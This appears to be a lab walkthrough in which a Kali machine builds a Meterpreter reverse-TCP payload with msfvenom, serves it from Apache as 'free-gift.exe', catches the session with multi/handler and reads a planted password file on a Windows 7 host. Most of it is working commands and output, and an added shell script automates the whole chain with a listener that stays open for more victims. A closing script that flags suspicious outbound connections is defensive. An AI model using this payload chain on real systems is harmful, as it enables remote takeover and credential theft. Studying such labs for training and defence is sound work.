When threat actors (hackers) gain access to a system, they usually want future access as well, and they want it to be easy. An attacker can install a backdoor application that either allows future access or collects information to use in further attacks. Many backdoors are installed by users clicking something without realizing that the link they clicked or the file they opened is a threat. Backdoors can also be dropped by a virus, worm, or other malware.
When threat actors gain access to a system, they may also be able to take several actions. What they can do depends on the level of access they have or can achieve, which is determined by the permissions of the account they compromised. One of the most devastating capabilities available to an attacker is executing code on a device: code execution can compromise the confidentiality, integrity, and availability of the system or network.
root@kali:~# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --smallest                   Generate the smallest possible payload using all available encoders
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=1234 --format=exe > free-gift.exe // LHOST IS KALI IP; CREATE A .exe WINDOWS PAYLOAD FILE
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
root@kali:~# ls
Desktop  Documents  Downloads  free-gift.exe  Music  Pictures  Public  sshd_config.save  Templates  try2hack  Videos  websites  yersinia.log
Start the Apache web server on Kali. The Windows 7 machine will download the payload (the .exe just built) from it.
root@kali:~# service apache2 status
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
   Active: inactive (dead)
root@kali:~# service apache2 <ENTER> // VIEW COMMAND OPTIONS
Usage: apache2 {start|stop|graceful-stop|restart|reload|force-reload}
root@kali:~# service apache2 start
root@kali:~# service apache2 status
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
   Active: active (running) since Wed 2018-10-17 04:58:39 EDT; 2s ago
  Process: 2278 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
 Main PID: 2289 (apache2)
    Tasks: 7 (limit: 2344)
   Memory: 21.1M
   CGroup: /system.slice/apache2.service
           ├─2289 /usr/sbin/apache2 -k start
           ├─2290 /usr/sbin/apache2 -k start
           ├─2291 /usr/sbin/apache2 -k start
           ├─2292 /usr/sbin/apache2 -k start
           ├─2293 /usr/sbin/apache2 -k start
           ├─2294 /usr/sbin/apache2 -k start
           └─2295 /usr/sbin/apache2 -k start

Oct 17 04:58:39 kali systemd[1]: Starting The Apache HTTP Server...
Oct 17 04:58:39 kali apachectl[2278]: AH00558: apache2: Could not reliably determine the se
Oct 17 04:58:39 kali systemd[1]: Started The Apache HTTP Server.
Copy the payload file (.exe) into the Apache document root:
root@kali:~# ls
Desktop  Documents  Downloads  free-gift.exe  Music  Pictures  Public  sshd_config.save  Templates  try2hack  Videos  websites  yersinia.log
root@kali:~# cp free-gift.exe /var/www/html
root@kali:~# cd /var/www/html
root@kali:/var/www/html# ls
free-gift.exe  index.html  index.nginx-debian.html
You can also use the GUI: click Files (folder icon) > Home > copy free-gift.exe > Other Locations > Computer > var > www > html
Start the PostgreSQL database so that msfconsole can connect to the Metasploit database. Note the status output below: on Kali, postgresql.service is only a wrapper unit (its ExecStart is /bin/true, which is why it reports active (exited)); the actual cluster runs as postgresql@<version>-main.service. If msfconsole still complains that nothing is listening on port 5432, run msfdb init (first use) or msfdb start, then confirm with db_status.
root@kali:~# service postgresql status
● postgresql.service - PostgreSQL RDBMS
   Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disable
   Active: inactive (dead)
root@kali:~# service postgresql start
root@kali:~# service postgresql status
● postgresql.service - PostgreSQL RDBMS
   Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disable
   Active: active (exited) since Wed 2018-10-17 05:10:46 EDT; 2s ago
  Process: 2605 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
 Main PID: 2605 (code=exited, status=0/SUCCESS)

Oct 17 05:10:46 kali systemd[1]: Starting PostgreSQL RDBMS...
Oct 17 05:10:46 kali systemd[1]: Started PostgreSQL RDBMS.
Type msfconsole to launch the Metasploit Framework. The payload itself was already built with msfvenom; what gets set up here is the listener (exploit/multi/handler) that catches the connection back from the Windows 7 machine.
root@kali:/var/www/html# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
        Is the server running on host "localhost" (::1) and accepting
        TCP/IP connections on port 5432?
could not connect to server: Connection refused
        Is the server running on host "localhost" (127.0.0.1) and accepting
        TCP/IP connections on port 5432?
[*] Starting the Metasploit Framework console...
[-] Failed to connect to the database: could not connect to server: Connection refused
        Is the server running on host "localhost" (::1) and accepting
        TCP/IP connections on port 5432?
could not connect to server: Connection refused
        Is the server running on host "localhost" (127.0.0.1) and accepting
        TCP/IP connections on port 5432?

[Metasploit ASCII-art banner]

       =[ metasploit v4.17.11-dev                         ]
+ -- --=[ 1807 exploits - 1028 auxiliary - 313 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > db_status // CHECK THE METASPLOIT DATABASE CONNECTION
[*] postgresql connected to msf
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.110
LHOST => 192.168.1.110
msf exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf exploit(multi/handler) > show options // VIEW PAYLOAD OPTIONS

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.110    yes       The listen address (an interface may be specified)
   LPORT     1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit -h
Usage: exploit [options]

Launches an exploitation attempt.

OPTIONS:

    -e <opt>  The payload encoder to use.  If none is specified, ENCODER is used.
    -f        Force the exploit to run regardless of the value of MinimumRank.
    -h        Help banner.
    -j        Run in the context of a job.
    -n <opt>  The NOP generator to use.  If none is specified, NOP is used.
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The payload to use.  If none is specified, PAYLOAD is used.
    -t <opt>  The target index or name to use.  If none is specified, TARGET is used.
    -z        Do not interact with the session after successful exploitation.

msf exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.110:1234
msf exploit(multi/handler) >
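The three steps above (build the payload with msfvenom, stage it in the Apache webroot, start the multi/handler listener) collected into one script, as an added example that is not from the original post. It assumes the same Kali layout the post uses (/var/www/html as the document root, msfvenom and msfconsole on PATH, LHOST 192.168.1.110, LPORT 1234); the function names, the LHOST sanity check and the RUN_LIVE guard are my own. Two small changes from the hand-typed version: msfvenom writes the file with -o rather than a shell redirect, and the handler is driven by a resource script that sets ExitOnSession false so one listener keeps catching sessions after the first victim connects.

```shell
#!/bin/sh
# Added example (not from the post): msfvenom payload -> Apache webroot -> multi/handler, scripted.
# Assumed defaults match the post's lab; override any of them with environment variables.
set -eu

LHOST="${LHOST:-192.168.1.110}"          # Kali IP, where the victim connects back to
LPORT="${LPORT:-1234}"
PAYLOAD="windows/meterpreter/reverse_tcp"
OUTFILE="${OUTFILE:-free-gift.exe}"
WEBROOT="${WEBROOT:-/var/www/html}"      # Apache document root on Kali

# Refuse a malformed LHOST early: a typo here is the usual reason the stage never arrives.
valid_ipv4() {
  printf '%s\n' "$1" | awk -F'[.]' 'NF != 4 { exit 1 }
    { for (i = 1; i <= 4; i++) if ($i !~ /^[0-9]+$/ || $i > 255) exit 1 }'
}

# The msfvenom command line the post runs, with -o instead of ">" so that only the
# payload bytes (never a stderr message) can end up inside the .exe.
venom_cmd() {
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s\n' "$PAYLOAD" "$1" "$2" "$3"
}

# msfconsole resource script equivalent to the commands typed by hand in the post.
# ExitOnSession false keeps the background job listening after the first session opens.
handler_rc() {
  cat <<EOF
use exploit/multi/handler
set payload $PAYLOAD
set LHOST $1
set LPORT $2
set ExitOnSession false
exploit -j -z
EOF
}

main() {
  valid_ipv4 "$LHOST" || { echo "LHOST '$LHOST' is not a dotted-quad IPv4 address" >&2; exit 1; }
  eval "$(venom_cmd "$LHOST" "$LPORT" "$OUTFILE")"
  install -m 0644 "$OUTFILE" "$WEBROOT/"           # stage the file for download over HTTP
  systemctl start apache2 postgresql               # the same services the post starts with 'service'
  handler_rc "$LHOST" "$LPORT" > handler.rc
  msfconsole -q -r handler.rc                      # -r runs the resource script at startup
}

# Only the live steps need the Metasploit tooling; run them with RUN_LIVE=1 on Kali.
if [ "${RUN_LIVE:-0}" = 1 ]; then main; fi
```

Run it as RUN_LIVE=1 ./stage.sh on Kali; without RUN_LIVE it only defines the helpers, which is handy for checking the generated command line and resource script before touching a live listener.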
Go to the Windows 7 machine and download the payload from the Apache web server running on Kali (http://192.168.1.110/free-gift.exe). In a real attack the file would be delivered by some other social-engineering route (email attachment, USB drop, cloned website, etc.).
I simply chose to run the payload (.exe). A real threat actor would make the file (or URL) enticing so that the victim runs it.
Once the victim downloads and opens the payload, the handler in Metasploit picks up the connection and opens a session:
msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.1.130
[*] Meterpreter session 1 opened (192.168.1.110:1234 -> 192.168.1.130:49222) at 2018-10-17 05:26:51 -0400
msf exploit(multi/handler) > sessions -i // LIST SESSIONS (sessions -l does the same)

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  1         meterpreter x86/windows  WIN-7V0EVV4BKQJ\Administrator @ WIN-7V0EVV4BKQJ  192.168.1.110:1234 -> 192.168.1.130:49222 (192.168.1.130)

msf exploit(multi/handler) > sessions -i 1 // INTERACT WITH SESSION ID 1
[*] Starting interaction with 1...
Once you have established the remote (backdoor) session, you can start reconnaissance on the machine with Meterpreter's built-in commands (sysinfo, ipconfig, pwd, ls, cat, and so on):
meterpreter > sysinfo
Computer        : WIN-7V0EVV4BKQJ
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:6b:99:7a
MTU          : 1500
IPv4 Address : 192.168.1.130
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::104a:e373:9974:3524
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:182
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
I created a text file on the Windows 7 desktop and put sensitive info such as usernames and passwords in it. Also notice that netstat on the Windows 7 machine shows an ESTABLISHED TCP session with Kali (192.168.1.110) on port 1234; that connection is the backdoor.
meterpreter > pwd // VERIFY CURRENT DIRECTORY
C:\Users\Administrator\Desktop
meterpreter > ls // LIST FILES

Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  44    fil   2018-10-17 05:32:07 -0400  PASSWORDS.txt
100666/rw-rw-rw-  950   fil   2018-09-15 23:03:29 -0400  PuTTY.lnk
100666/rw-rw-rw-  282   fil   2018-09-15 22:50:44 -0400  desktop.ini

meterpreter > cat PASSWORDS.txt // VIEW CONTENTS OF THE FILE
cisco
cisco123
admin cisco
admin admin
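The defender's side of the same picture, as an added example that is not part of the post: the one artifact the post points at is the ESTABLISHED connection from the victim to Kali on port 1234, and that is exactly what to hunt for on a suspect host. The netstat -ano lines below are constructed for this example (the post does not reproduce its netstat screen); the allow-list of remote ports and the function names are my own choices. The check runs over a saved copy of the Windows output, so it works in any POSIX shell with awk.

```shell
#!/bin/sh
# Added example (not from the post): flag ESTABLISHED outbound TCP connections whose
# remote port is outside an allow-list, from saved `netstat -ano` output.
set -eu

# Constructed sample of `netstat -ano` on the Windows 7 victim. The 192.168.1.110:1234
# line is the Meterpreter reverse_tcp connection; the 443 line stands in for normal traffic.
sample_netstat() {
  cat <<'EOF'

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       704
  TCP    192.168.1.130:49222    192.168.1.110:1234     ESTABLISHED     2916
  TCP    192.168.1.130:49231    93.184.216.34:443      ESTABLISHED     1884
  TCP    192.168.1.130:49240    192.168.1.1:80         TIME_WAIT       0
  UDP    0.0.0.0:5355           *:*                                    1096
EOF
}

# Print "PID remote" for every ESTABLISHED TCP connection whose remote port is not in $1
# (a space-separated allow-list). The port is taken after the last ':' so IPv6 literals
# such as [::1]:443 are handled too. Usage: flag_outbound "80 443" < netstat.txt
flag_outbound() {
  awk -v allow="$1" '
    BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    $1 == "TCP" && $4 == "ESTABLISHED" {
      port = $3; sub(/.*:/, "", port)
      if (!(port in ok)) print $5, $3
    }'
}

# Stand-alone run: expect the 192.168.1.110:1234 connection (PID 2916) and nothing else.
sample_netstat | flag_outbound "80 443"
```

On the Windows side the PID it prints is the pivot: tasklist /FI "PID eq 2916" names the process holding the connection (here it would be the free-gift.exe the victim ran). Allow-listing by port is deliberately crude; a reverse_tcp handler can just as well sit on 443, so treat the output as a list of connections to look at, not as a verdict.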